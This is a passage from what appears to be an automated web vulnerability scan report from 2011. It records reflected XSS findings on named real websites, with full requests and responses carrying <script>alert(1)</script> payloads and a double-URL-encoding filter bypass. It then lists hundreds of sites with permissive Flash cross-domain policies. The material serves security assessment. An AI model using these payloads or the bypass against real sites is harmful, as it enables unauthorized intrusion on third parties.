Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?472db"><script>alert(1)</script>5fb6f99eb03=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mannatech.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 263
Location: https://www.mannatech.com/favicon.ico?472db"><script>alert(1)</script>5fb6f99eb03=1
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:17:45 GMT
Connection: close

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.mannatech.com/favicon.ico?472db"><script>alert(1)</script>5fb6f99eb03=1">
...[SNIP]...

5.30. http://www.rachelray.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rachelray.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41cd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5a37004a68 was submitted in the REST URL parameter 1. This input was echoed as 41cd2"><script>alert(1)</script>a5a37004a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /favicon.ico41cd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5a37004a68 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rachelray.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash06
X-AspNet-Version: 2.0.50727
Content-Length: 195
Location: http://rachelray.in/favicon.ico41cd2"><script>alert(1)</script>a5a37004a68
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://rachelray.in/favicon.ico41cd2"><script>alert(1)</script>a5a37004a68">here</a>.</body>

5.31. http://www.rachelray.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rachelray.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da84"><script>alert(1)</script>c352ba45b47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9da84"><script>alert(1)</script>c352ba45b47=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rachelray.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 198
Location: http://rachelray.in/favicon.ico?9da84"><script>alert(1)</script>c352ba45b47=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://rachelray.in/favicon.ico?9da84"><script>alert(1)</script>c352ba45b47=1">here</a>.</body>

6. Flash cross-domain policy previous next
There are 263 instances of this issue:

http://pixel.fetchback.com/crossdomain.xml
http://www.1888932-2946.ws/crossdomain.xml
http://www.1iota.com/crossdomain.xml
http://www.3dvo-models.com/crossdomain.xml
http://www.55krc.com/crossdomain.xml
http://www.950kjr.com/crossdomain.xml
http://www.955thegame.com/crossdomain.xml
http://www.abc-7.com/crossdomain.xml
http://www.activitytv.com/crossdomain.xml
http://www.adjack.net/crossdomain.xml
http://www.admaximizer.com/crossdomain.xml
http://www.advancedministry.com/crossdomain.xml
http://www.affiliatecashpile.net/crossdomain.xml
http://www.aids.gov/crossdomain.xml
http://www.airbus.com/crossdomain.xml
http://www.alpha-vip.com/crossdomain.xml
http://www.bacardimojito.com/crossdomain.xml
http://www.barafranca.com/crossdomain.xml
http://www.bestvehicle4you.com/crossdomain.xml
http://www.bluestraveler.com/crossdomain.xml
http://www.bodybymilk.com/crossdomain.xml
http://www.booster-ads.com/crossdomain.xml
http://www.box24casino.com/crossdomain.xml
http://www.bunte.de/crossdomain.xml
http://www.buzzine.com/crossdomain.xml
http://www.chathambarsinn.com/crossdomain.xml
http://www.cnet.co.uk/crossdomain.xml
http://www.country925.com/crossdomain.xml
http://www.cpanel.net/crossdomain.xml
http://www.cyclechaos.com/crossdomain.xml
http://www.dailyhome.com/crossdomain.xml
http://www.davincisurgery.com/crossdomain.xml
http://www.dddnews.com/crossdomain.xml
http://www.dealercrm.com/crossdomain.xml
http://www.dezercollection.com/crossdomain.xml
http://www.dovogame.com/crossdomain.xml
http://www.egroupnet.com/crossdomain.xml
http://www.emol.com/crossdomain.xml
http://www.empoweringparents.com/crossdomain.xml
http://www.everywherechat.com/crossdomain.xml
http://www.eye-make-up-tips.com/crossdomain.xml
http://www.ezfolk.com/crossdomain.xml
http://www.financesate.com/crossdomain.xml
http://www.flor.com/crossdomain.xml
http://www.funkitron.com/crossdomain.xml
http://www.gamekult.com/crossdomain.xml
http://www.georgeharrison.com/crossdomain.xml
http://www.glidden.com/crossdomain.xml
http://www.gosupermodel.com/crossdomain.xml
http://www.healthzone.ca/crossdomain.xml
http://www.homehealthplanet.com/crossdomain.xml
http://www.hot1079.com/crossdomain.xml
http://www.hudong.com/crossdomain.xml
http://www.iconaircraft.com/crossdomain.xml
http://www.incontention.com/crossdomain.xml
http://www.instantpresenter.com/crossdomain.xml
http://www.irenewdemos.com/crossdomain.xml
http://www.itworld.com/crossdomain.xml
http://www.jcosplay.com/crossdomain.xml
http://www.jewishxdate.com/crossdomain.xml
http://www.jhunewsletter.com/crossdomain.xml
http://www.kansasspeedway.com/crossdomain.xml
http://www.karafun.com/crossdomain.xml
http://www.kedscollective.com/crossdomain.xml
http://www.keyhealthclub.com/crossdomain.xml
http://www.kiss107.com/crossdomain.xml
http://www.kissfunny.com/crossdomain.xml
http://www.learningcurve.com/crossdomain.xml
http://www.legalseafoods.com/crossdomain.xml
http://www.localfordoffer.com/crossdomain.xml
http://www.machomoe.com/crossdomain.xml
http://www.madtwist.com/crossdomain.xml
http://www.marcjacobs.com/crossdomain.xml
http://www.matchbox.com/crossdomain.xml
http://www.mediapost.com/crossdomain.xml
http://www.mertado.com/crossdomain.xml
http://www.michellebranch.com/crossdomain.xml
http://www.mix961.com/crossdomain.xml
http://www.mofuse.com/crossdomain.xml
http://www.mountainrailwv.com/crossdomain.xml
http://www.moxieteenz.com/crossdomain.xml
http://www.myfoxlubbock.com/crossdomain.xml
http://www.n9negroup.com/crossdomain.xml
http://www.needstosell.com/crossdomain.xml
http://www.netscrap.com/crossdomain.xml
http://www.nevershoutnever.com/crossdomain.xml
http://www.newschannel34.com/crossdomain.xml
http://www.nextbus.com/crossdomain.xml
http://www.nfb.ca/crossdomain.xml
http://www.ntv.ru/crossdomain.xml
http://www.officialsanctuary.com/crossdomain.xml
http://www.openfilm.com/crossdomain.xml
http://www.ovm.org/crossdomain.xml
http://www.percyjacksonbooks.com/crossdomain.xml
http://www.performgroup.com/crossdomain.xml
http://www.phoneofvoip.com/crossdomain.xml
http://www.photofunia.com/crossdomain.xml
http://www.pirelli.com/crossdomain.xml
http://www.pratttribune.com/crossdomain.xml
http://www.primusville.com/crossdomain.xml
http://www.puuko.com/crossdomain.xml
http://www.quakersteakandlube.com/crossdomain.xml
http://www.radiofarda.com/crossdomain.xml
http://www.realore.com/crossdomain.xml
http://www.ringtonekey.com/crossdomain.xml
http://www.sanmanuel.com/crossdomain.xml
http://www.semilo.com/crossdomain.xml
http://www.silkpurealmond.com/crossdomain.xml
http://www.skittles.com/crossdomain.xml
http://www.slizone.com/crossdomain.xml
http://www.smalldressup.com/crossdomain.xml
http://www.smucker.com/crossdomain.xml
http://www.sooeveningnews.com/crossdomain.xml
http://www.startlap.hu/crossdomain.xml
http://www.stream.cz/crossdomain.xml
http://www.terrypaton.com/crossdomain.xml
http://www.thecoastalsource.com/crossdomain.xml
http://www.trade2finance.com/crossdomain.xml
http://www.tv5.org/crossdomain.xml
http://www.ucanbuyme.com/crossdomain.xml
http://www.uhc-networkbulletin.com/crossdomain.xml
http://www.ussoccer.com/crossdomain.xml
http://www.vdopia.com/crossdomain.xml
http://www.versuscountrybagamonsterbuck.com/crossdomain.xml
http://www.visitpensacola.com/crossdomain.xml
http://www.wandtv.com/crossdomain.xml
http://www.washfm.com/crossdomain.xml
http://www.watfordoutlet.com/crossdomain.xml
http://www.weallwantsomeone.org/crossdomain.xml
http://www.weddingdecor.com/crossdomain.xml
http://www.werelate.org/crossdomain.xml
http://www.wlns.com/crossdomain.xml
http://www.wmji.com/crossdomain.xml
http://www.xpmedia.com/crossdomain.xml
http://www.yorkpress.co.uk/crossdomain.xml
http://www.yougamers.com/crossdomain.xml
http://www.youtongue.com/crossdomain.xml
http://www.zdf.de/crossdomain.xml
http://www.adam4cams.com/crossdomain.xml
http://www.adtotal.pl/crossdomain.xml
http://www.allaccess.com.ph/crossdomain.xml
http://www.artistrising.com/crossdomain.xml
http://www.bikerplanet.com/crossdomain.xml
http://www.bmwmotorcycles.com/crossdomain.xml
http://www.bookfresh.com/crossdomain.xml
http://www.brockport.edu/crossdomain.xml
http://www.bullionvault.com/crossdomain.xml
http://www.camscape.com/crossdomain.xml
http://www.cashfiesta.com/crossdomain.xml
http://www.columbuslocalnews.com/crossdomain.xml
http://www.contentedits.com/crossdomain.xml
http://www.cybermonday.com/crossdomain.xml
http://www.dailyadvance.com/crossdomain.xml
http://www.dana.org/crossdomain.xml
http://www.deathpenaltyinfo.org/crossdomain.xml
http://www.dundermifflininfinity.com/crossdomain.xml
http://www.film4.com/crossdomain.xml
http://www.foxsportsmidwest.com/crossdomain.xml
http://www.goldaffiliateprogram.com/crossdomain.xml
http://www.golfholiday.com/crossdomain.xml
http://www.hutchnews.com/crossdomain.xml
http://www.icelandair.is/crossdomain.xml
http://www.ifamouz.com/crossdomain.xml
http://www.imbc.com/crossdomain.xml
http://www.indavideo.hu/crossdomain.xml
http://www.intermediaoutdoors.com/crossdomain.xml
http://www.junodownload.com/crossdomain.xml
http://www.kboi2.com/crossdomain.xml
http://www.keepbusy.net/crossdomain.xml
http://www.keprtv.com/crossdomain.xml
http://www.kerrang.com/crossdomain.xml
http://www.kimatv.com/crossdomain.xml
http://www.lakewood.cc/crossdomain.xml
http://www.ldssingles.com/crossdomain.xml
http://www.livedoor.biz/crossdomain.xml
http://www.livemanplay.com/crossdomain.xml
http://www.luckymn.com/crossdomain.xml
http://www.manoramaonline.com/crossdomain.xml
http://www.menshealth.co.uk/crossdomain.xml
http://www.mkt859.com/crossdomain.xml
http://www.moikrewni.pl/crossdomain.xml
http://www.mygazines.com/crossdomain.xml
http://www.neogen.ro/crossdomain.xml
http://www.newtondailynews.com/crossdomain.xml
http://www.onntv.com/crossdomain.xml
http://www.onthesnow.com/crossdomain.xml
http://www.optionmonster.com/crossdomain.xml
http://www.paperwishes.com/crossdomain.xml
http://www.permissionresearch.com/crossdomain.xml
http://www.photodex.com/crossdomain.xml
http://www.picturesongold.com/crossdomain.xml
http://www.playspan.com/crossdomain.xml
http://www.plejada.pl/crossdomain.xml
http://www.prodigy.com/crossdomain.xml
http://www.ptc.com/crossdomain.xml
http://www.putnam.com/crossdomain.xml
http://www.quickhit.com/crossdomain.xml
http://www.rccaraction.com/crossdomain.xml
http://www.redbull.com/crossdomain.xml
http://www.revelex.com/crossdomain.xml
http://www.riddell.com/crossdomain.xml
http://www.rockymounttelegram.com/crossdomain.xml
http://www.rydercup.com/crossdomain.xml
http://www.salemkeizer.org/crossdomain.xml
http://www.saljournal.com/crossdomain.xml
http://www.sherwin.com/crossdomain.xml
http://www.shopstyle.co.uk/crossdomain.xml
http://www.smiliegames.com/crossdomain.xml
http://www.snponline.com/crossdomain.xml
http://www.soundsnap.com/crossdomain.xml
http://www.startrekonline.com/crossdomain.xml
http://www.swissotel.com/crossdomain.xml
http://www.teoriza.com/crossdomain.xml
http://www.theconsumerwinner.com/crossdomain.xml
http://www.thedailyworld.com/crossdomain.xml
http://www.timetospa.com/crossdomain.xml
http://www.toryburch.com/crossdomain.xml
http://www.tripadvisor.fr/crossdomain.xml
http://www.tripadvisor.ie/crossdomain.xml
http://www.tudiscoverykids.com/crossdomain.xml
http://www.tuenti.com/crossdomain.xml
http://www.vanderbilthealth.com/crossdomain.xml
http://www.vk.com/crossdomain.xml
http://www.wbez.org/crossdomain.xml
http://www.wokv.com/crossdomain.xml
http://www.yogabbagabba.com/crossdomain.xml
http://www.artofdrink.com/crossdomain.xml
http://www.atat.ro/crossdomain.xml
http://www.athensmessenger.com/crossdomain.xml
http://www.austrian.com/crossdomain.xml
http://www.awana.org/crossdomain.xml
http://www.biblemoneymatters.com/crossdomain.xml
http://www.bluechipcasino.com/crossdomain.xml
http://www.ccci.org/crossdomain.xml
http://www.computer-juice.com/crossdomain.xml
http://www.digidesign.com/crossdomain.xml
http://www.dreammakerhotdogcarts.com/crossdomain.xml
http://www.ebarrelracing.com/crossdomain.xml
http://www.english-at-home.com/crossdomain.xml
http://www.euro-fight-girls.com/crossdomain.xml
http://www.frick.org/crossdomain.xml
http://www.indiainfo.com/crossdomain.xml
http://www.justborn.com/crossdomain.xml
http://www.lakegenevawi.com/crossdomain.xml
http://www.lightstalkers.org/crossdomain.xml
http://www.moviegator.com/crossdomain.xml
http://www.nhk.or.jp/crossdomain.xml
http://www.npgdigital.net/crossdomain.xml
http://www.peninsula.com/crossdomain.xml
http://www.peppermillreno.com/crossdomain.xml
http://www.ppstream.com/crossdomain.xml
http://www.recordingreview.com/crossdomain.xml
http://www.rockport.com/crossdomain.xml
http://www.safefiles.net/crossdomain.xml
http://www.stingrayboats.com/crossdomain.xml
http://www.thedigitel.com/crossdomain.xml
http://www.thewesterlysun.com/crossdomain.xml
http://www.timesleaderautos.com/crossdomain.xml
http://www.traceadkins.com/crossdomain.xml
http://www.tumblebooks.com/crossdomain.xml
http://www.waterwizz.com/crossdomain.xml
http://www.wmicentral.com/crossdomain.xml
http://www.wrapcandy.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://pixel.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.2. http://www.1888932-2946.ws/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.1888932-2946.ws
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1888932-2946.ws

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 16 Feb 2010 20:13:59 GMT
Accept-Ranges: bytes
ETag: "a43e439344afca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:14:44 GMT
Connection: close
Content-Length: 217

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cro
...[SNIP]...

6.3. http://www.1iota.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.1iota.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1iota.com

Response

HTTP/1.1 200 OK
Content-Length: 204
Content-Type: text/xml
Content-Location: http://www.1iota.com/crossdomain.xml
Last-Modified: Fri, 21 Jan 2011 22:41:29 GMT
Accept-Ranges: bytes
ETag: "98c1a58bcb9cb1:ac9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.4. http://www.3dvo-models.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.3dvo-models.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.3dvo-models.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Mon, 31 Aug 2009 18:01:10 GMT
ETag: "f53c216-9c-47273d1974580"
Accept-Ranges: bytes
Content-Length: 156
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" to-ports="80"/>
</cross-domain-policy>

6.5. http://www.55krc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.55krc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.55krc.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3187036575
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 00:51:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 00:51:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.6. http://www.950kjr.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.950kjr.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.950kjr.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188587186 3188459094
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:38:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:38:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.7. http://www.955thegame.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.955thegame.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.955thegame.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:33 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
Last-Modified: Wed, 23 Apr 2008 18:04:28 GMT
ETag: "18936-125-480f7a2c"
Accept-Ranges: bytes
Content-Length: 293
Keep-Alive: timeout=5
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerRadio_Pool=3541059651.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-
...[SNIP]...

6.8. http://www.abc-7.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abc-7.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abc-7.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9f2"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 04:17:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 04:17:39 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.9. http://www.activitytv.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.activitytv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.activitytv.com

Response

HTTP/1.1 200 OK
Content-Length: 81
Content-Type: text/xml
Content-Location: http://www.activitytv.com/crossdomain.xml
Last-Modified: Wed, 10 Sep 2008 20:41:37 GMT
Accept-Ranges: bytes
ETag: "8096a59e8513c91:2c72"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:41 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.10. http://www.adjack.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.adjack.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adjack.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 20 Jul 2009 21:03:41 GMT
Accept-Ranges: bytes
ETag: "9fb0468f7d9ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:42 GMT
Connection: close
Content-Length: 271

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control per
...[SNIP]...

6.11. http://www.admaximizer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.admaximizer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.admaximizer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:46:42 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Wed, 06 Oct 2010 21:42:50 GMT
Accept-Ranges: bytes
Content-Length: 214
P3P: policyref="http://www.admaximizer.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND COM NAV"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure='false' />
</cross-d
...[SNIP]...

6.12. http://www.advancedministry.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.advancedministry.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.advancedministry.com

Response

HTTP/1.1 200 OK
Content-Length: 210
Content-Type: text/xml
Content-Location: http://www.advancedministry.com/crossdomain.xml
Last-Modified: Tue, 25 Nov 2008 18:31:10 GMT
Accept-Ranges: bytes
ETag: "d8994fd2b4fc91:1d36"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:17:21 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-doma
...[SNIP]...

6.13. http://www.affiliatecashpile.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.affiliatecashpile.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.affiliatecashpile.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:00 GMT
Server: Apache/2.2.17 (Unix) mod_apreq2-20051231/2.6.0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Mon, 14 Dec 2009 23:15:56 GMT
ETag: "ba8049-fb-47ab8749f2300"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-http-request-headers-from domain="*" headers="*"/><allow-access-from domain="*" />
...[SNIP]...

6.14. http://www.aids.gov/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aids.gov
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aids.gov

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 04 May 2011 03:43:48 GMT
Content-type: text/xml
Last-modified: Tue, 03 May 2011 15:13:22 GMT
Content-length: 214
Etag: "d6-4dc01b92"
Accept-ranges: bytes
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-
...[SNIP]...

6.15. http://www.airbus.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.airbus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.airbus.com

Response

HTTP/1.1 200 OK
Content-Length: 292
Content-Type: application/xml
ETag: "1f861-124-47947d7dbfe4e"
Last-Modified: Thu, 26 Nov 2009 15:29:38 GMT
Accept-Ranges: bytes
Server: Apache
Date: Wed, 04 May 2011 01:56:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow
...[SNIP]...

6.16. http://www.alpha-vip.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.alpha-vip.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.alpha-vip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:57:47 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 18:56:33 GMT
ETag: "ff28-159-494167bbcba40"
Accept-Ranges: bytes
Content-Length: 345
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.17. http://www.bacardimojito.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bacardimojito.com
Path:	/crossdomain.xml

